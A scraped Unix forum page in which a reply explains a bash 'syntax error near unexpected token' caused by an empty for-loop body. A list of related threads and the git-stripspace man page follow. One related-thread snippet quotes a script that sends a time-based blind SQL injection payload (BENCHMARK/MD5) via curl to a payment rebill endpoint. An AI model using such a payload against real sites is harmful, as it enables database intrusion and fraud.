Sponsored Content
Top Forums UNIX for Beginners Questions & Answers Syntax error near unexpected token Post 303016639 by RudiC on Tuesday 1st of May 2018 03:21:19 AM
Old 05-01-2018
Due to the line commented out, the shell sees
Code:
     for (( w=1; w <= 8; ++w ));     do      done

which it doesn't like. Try adding e.g. a : (NOP) statement.

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

What do I do here? #!/bin/bash payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)# hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'` curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill... (2 Replies)
Discussion started by: iiiiiiiiiii
2 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

8. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

9. How to Post in the The UNIX and Linux Forums

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

10. Ubuntu

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies
GIT-STRIPSPACE(1)						    Git Manual							 GIT-STRIPSPACE(1)

NAME
git-stripspace - Remove unnecessary whitespace SYNOPSIS
git stripspace [-s | --strip-comments] < input DESCRIPTION
Clean the input in the manner used by Git for text such as commit messages, notes, tags and branch descriptions. With no arguments, this will: o remove trailing whitespace from all lines o collapse multiple consecutive empty lines into one empty line o remove empty lines from the beginning and end of the input o add a missing to the last line if necessary. In the case where the input consists entirely of whitespace characters, no output will be produced. NOTE: This is intended for cleaning metadata, prefer the --whitespace=fix mode of git-apply(1) for correcting whitespace of patches or files in the repository. OPTIONS
-s, --strip-comments Skip and remove all lines starting with comment character (default #). -c, --comment-lines Prepend comment character and blank to each line. Lines will automatically be terminated with a newline. On empty lines, only the comment character will be prepended. EXAMPLES
Given the following noisy input with $ indicating the end of a line: |A brief introduction $ | $ |$ |A new paragraph$ |# with a commented-out line $ |explaining lots of stuff.$ |$ |# An old paragraph, also commented-out. $ | $ |The end.$ | $ Use git stripspace with no arguments to obtain: |A brief introduction$ |$ |A new paragraph$ |# with a commented-out line$ |explaining lots of stuff.$ |$ |# An old paragraph, also commented-out.$ |$ |The end.$ Use git stripspace --strip-comments to obtain: |A brief introduction$ |$ |A new paragraph$ |explaining lots of stuff.$ |$ |The end.$ GIT
Part of the git(1) suite Git 1.8.5.3 01/14/2014 GIT-STRIPSPACE(1)